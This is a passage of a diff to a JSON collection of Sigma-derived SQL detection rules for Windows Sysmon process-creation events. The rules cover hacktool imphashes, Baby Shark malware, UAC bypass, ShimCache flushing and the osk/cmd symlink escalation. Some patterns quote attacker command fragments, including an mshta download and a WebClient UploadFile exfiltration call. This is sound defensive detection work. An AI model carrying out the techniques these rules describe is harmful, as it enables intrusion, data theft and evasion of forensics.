legitimate user" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', 
'4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', 
'0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnx.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_lolbin_dnx.yml" }, { - "title": "Suspicious Rundll32 Script in CommandLine", - "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", - "status": "experimental", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "frack113, Zaw Min Htun (ZETA)", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", + "status": "test", + "description": "Detects suspicious child 
processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Administrative scripts", + "Microsoft SCCM" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program 
Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_script_run.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Lolbin Runexehelper Use As Proxy", - "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", - "status": "experimental", - "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", - "author": "frack113", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_runexehelper.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": 
"2afafd61-6aae-4df4-baed-139fa1f4c345", + "title": "Suspicious Userinit Child Process", + "id": "b655a06a-31c0-477a-95c2-3726b83d649d", "status": "test", - "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", - "author": "Thomas Patzke", + "description": "Detects a suspicious child process of userinit", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden (idea)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "NTDS maintenance" + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%\\\\netlogon\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR OriginalFileName = 'explorer.exe')))" ], - "filename": "proc_creation_win_ntdsutil_usage.yml" + "filename": "proc_creation_win_susp_userinit_child.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.execution", - "attack.t1204" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Scripts that shutdown the system immediately and 
reboot them in safe mode are unlikely" + "Utilization of this tool should not be seen in enterprise environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "UAC Bypass via Event Viewer", - "id": "be344333-921d-4c4d-8bb8-e584cf584780", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE 
'%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Audio Capture via SoundRecorder", - "id": "83865853-59aa-449e-9600-74b9d89a6d6e", - "status": "test", - "description": "Detect attacker collecting audio via SoundRecorder application.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", + "status": "experimental", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1123" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_soundrecorder_audio_capture.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "Application Whitelisting Bypass via Dxcap.exe", - "id": "60f16a96-db70-42eb-8f76-16763e333590", - "status": "test", - "description": "Detects execution of of Dxcap.exe", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that 
clear the local ShimCache and remove forensic evidence", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "Legitimate execution of dxcap.exe by legitimate user" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_susp_dxcap.yml" + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" }, { - "title": "Suspicious Add User to Remote Desktop Users Group", - "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", "status": "experimental", - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". 
This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "Service Registry Key Deleted Via 